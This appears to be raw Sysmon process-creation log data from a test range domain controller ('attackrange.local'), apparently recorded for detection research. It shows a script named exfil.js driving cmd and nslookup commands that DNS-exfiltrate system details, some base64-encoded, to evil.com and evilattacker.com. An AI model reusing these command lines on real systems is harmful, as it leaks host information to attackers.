C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-593E-6078-450E-00000000AE01}6128C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsga.tmp 2>&1 154100x800000000000000068536Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.510{A8622C2F-593E-6078-450E-00000000AE01}6128C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsga.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068527Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.494{A8622C2F-593E-6078-440E-00000000AE01}3684C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-593E-6078-420E-00000000AE01}6044C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c 
nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleiahvpw.tmp 2>&1 154100x800000000000000068516Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.465{A8622C2F-593E-6078-420E-00000000AE01}6044C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleiahvpw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068506Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:22.299{A8622C2F-593E-6078-410E-00000000AE01}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000068485Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:20.404{A8622C2F-593C-6078-400E-00000000AE01}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000068473Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:19.887{A8622C2F-593B-6078-3F0E-00000000AE01}6128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000068455Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:19.231{A8622C2F-593B-6078-3E0E-00000000AE01}1372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000068418Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:17.299{A8622C2F-5939-6078-3D0E-00000000AE01}5168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000068410Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:17.209{A8622C2F-5939-6078-3C0E-00000000AE01}7044C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5939-6078-3A0E-00000000AE01}4604C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhakdwt.tmp 2>&1 154100x800000000000000068399Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:17.178{A8622C2F-5939-6078-3A0E-00000000AE01}4604C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c 
nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhakdwt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068377Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:16.632{A8622C2F-5938-6078-390E-00000000AE01}1348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000068369Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:16.105{A8622C2F-5938-6078-380E-00000000AE01}1372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000068323Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:10.090{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=BEB231ACF04E40B506403920D4DD795A,SHA256=2548884526E8FBC5781F5B3B2972E9B20CC16DD86BDE93D2E888023F6919F5A2,IMPHASH=661A40859BC6D47752E9FC5E02C1862C{A8622C2F-58C0-6078-F60D-00000000AE01}6444C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000068284Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.972{A8622C2F-592C-6078-360E-00000000AE01}4976C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-592C-6078-340E-00000000AE01}6652C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyqzr.tmp 2>&1 154100x800000000000000068273Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.943{A8622C2F-592C-6078-340E-00000000AE01}6652C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c 
nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyqzr.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000068264Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.928{A8622C2F-592C-6078-330E-00000000AE01}5200C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-592C-6078-310E-00000000AE01}5632C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmpqb.tmp 2>&1 154100x800000000000000068253Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.899{A8622C2F-592C-6078-310E-00000000AE01}5632C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmpqb.tmp 
2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000068244Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.884{A8622C2F-592C-6078-300E-00000000AE01}6108C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-592C-6078-2E0E-00000000AE01}920C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwkud.tmp 2>&1 154100x800000000000000068233Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.856{A8622C2F-592C-6078-2E0E-00000000AE01}920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwkud.tmp 
2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000068224Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.839{A8622C2F-592C-6078-2D0E-00000000AE01}6432C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-592C-6078-2B0E-00000000AE01}5444C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlinmwq.tmp 2>&1 154100x800000000000000068211Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:18:04.811{A8622C2F-592C-6078-2B0E-00000000AE01}5444C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlinmwq.tmp 
2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000068180Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:58.531{A8622C2F-5926-6078-2A0E-00000000AE01}5316C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5926-6078-280E-00000000AE01}5396C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlohxy.tmp 2>&1 154100x800000000000000068169Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:58.501{A8622C2F-5926-6078-280E-00000000AE01}5396C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlohxy.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068110Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:52.391{A8622C2F-5920-6078-270E-00000000AE01}6076C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5920-6078-250E-00000000AE01}2344C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhhaujp.tmp 2>&1 154100x800000000000000068099Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:52.362{A8622C2F-5920-6078-250E-00000000AE01}2344C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhhaujp.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000068071Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:49.256{A8622C2F-591D-6078-240E-00000000AE01}3264C:\Windows\System32\ipconfig.exe10.0.14393.0 (rs1_release.160715-1616)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeC:\Windows\system32\ipconfig.exe /displaydnsC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=29916DCEA5377C19996B417D9235F42F,SHA256=5EE3FD7CA1AC876D0DE539D469BFC333594FCA3DF9F377CC96C756D9648697F1,IMPHASH=3636F50089F8190E3308E8AEA8F2043A{A8622C2F-591D-6078-230E-00000000AE01}6108C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000068052Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:49.246{A8622C2F-591D-6078-230E-00000000AE01}6108C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000068033Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:47.707{A8622C2F-591B-6078-220E-00000000AE01}4940C:\Windows\System32\ipconfig.exe10.0.14393.0 (rs1_release.160715-1616)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeC:\Windows\system32\ipconfig.exe 
/flushdnsC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=29916DCEA5377C19996B417D9235F42F,SHA256=5EE3FD7CA1AC876D0DE539D469BFC333594FCA3DF9F377CC96C756D9648697F1,IMPHASH=3636F50089F8190E3308E8AEA8F2043A{A8622C2F-591B-6078-210E-00000000AE01}5756C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000068014Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:47.665{A8622C2F-591B-6078-210E-00000000AE01}5756C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5799-6078-BC0D-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000067934Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:34.729{A8622C2F-590E-6078-200E-00000000AE01}644C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-590E-6078-1E0E-00000000AE01}5184C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlesieai.tmp 2>&1 154100x800000000000000067923Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:34.700{A8622C2F-590E-6078-1E0E-00000000AE01}5184C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command 
